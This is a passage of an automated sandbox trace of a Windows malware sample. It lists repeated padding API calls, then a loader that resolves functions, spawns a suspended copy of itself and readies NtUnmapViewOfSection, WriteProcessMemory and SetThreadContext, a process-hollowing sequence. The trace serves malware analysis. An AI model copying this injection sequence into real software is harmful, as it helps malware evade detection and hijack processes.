TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.669] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.670] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.671] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0056.672] GetConsoleAliasA (in: Source=0x0, TargetBuffer=0x0, TargetBufferLength=0x0, ExeName=0x0 | out: TargetBuffer=0x0) returned 0x0 [0080.213] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0080.214] VirtualAlloc (lpAddress=0x0, dwSize=0x7e00, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0080.225] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0080.225] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0080.225] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0080.225] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0080.226] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0080.226] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0080.226] GetProcAddress (hModule=0x769b0000, lpProcName="Module32First") returned 0x76a46279 [0080.226] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0080.226] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x60 [0080.231] Module32First (hSnapshot=0x60, lpme=0x18e700) returned 1 [0080.232] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x220000 [0080.235] LoadLibraryA (lpLibFileName="user32") returned 0x773b0000 [0080.235] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0080.235] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageExtraInfo") returned 0x773eed76 [0080.235] LoadLibraryA (lpLibFileName="kernel32") returned 0x769b0000 [0080.235] GetProcAddress (hModule=0x769b0000, lpProcName="WinExec") returned 0x76a43051 [0080.235] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0080.236] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0080.237] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0080.237] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0080.237] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0080.237] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0080.237] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0080.237] GetProcAddress (hModule=0x779e0000, lpProcName="NtWriteVirtualMemory") returned 0x779ffe04 [0080.237] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassExA") returned 0x773cdb98 [0080.238] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0080.238] GetProcAddress (hModule=0x773b0000, lpProcName="PostMessageA") returned 0x773d3baa [0080.238] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0080.238] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0080.238] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0080.238] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0080.238] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0080.238] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0080.238] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0080.239] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0080.239] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0080.240] RegisterClassExA (param_1=0x18e3bc) returned 0x2ac1bb [0080.241] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x5014a [0080.917] PostMessageA (hWnd=0x5014a, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0080.917] GetMessageA (in: lpMsg=0x18e3ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e3ec) returned 1 [0080.917] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x230000 [0080.917] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x230000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe")) returned 0x45 [0080.918] GetStartupInfoA (in: lpStartupInfo=0x18e310 | out: lpStartupInfo=0x18e310*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0080.918] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe\" " [0080.918] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e310*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e368 | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe\" ", lpProcessInformation=0x18e368*(hProcess=0x7c, hThread=0x78, dwProcessId=0xe88, dwThreadId=0xe8c)) returned 1 [0080.932] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.933] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x230000 [0080.933] GetThreadContext (in: hThread=0x78, lpContext=0x230000 | out: lpContext=0x230000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402ed7, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, 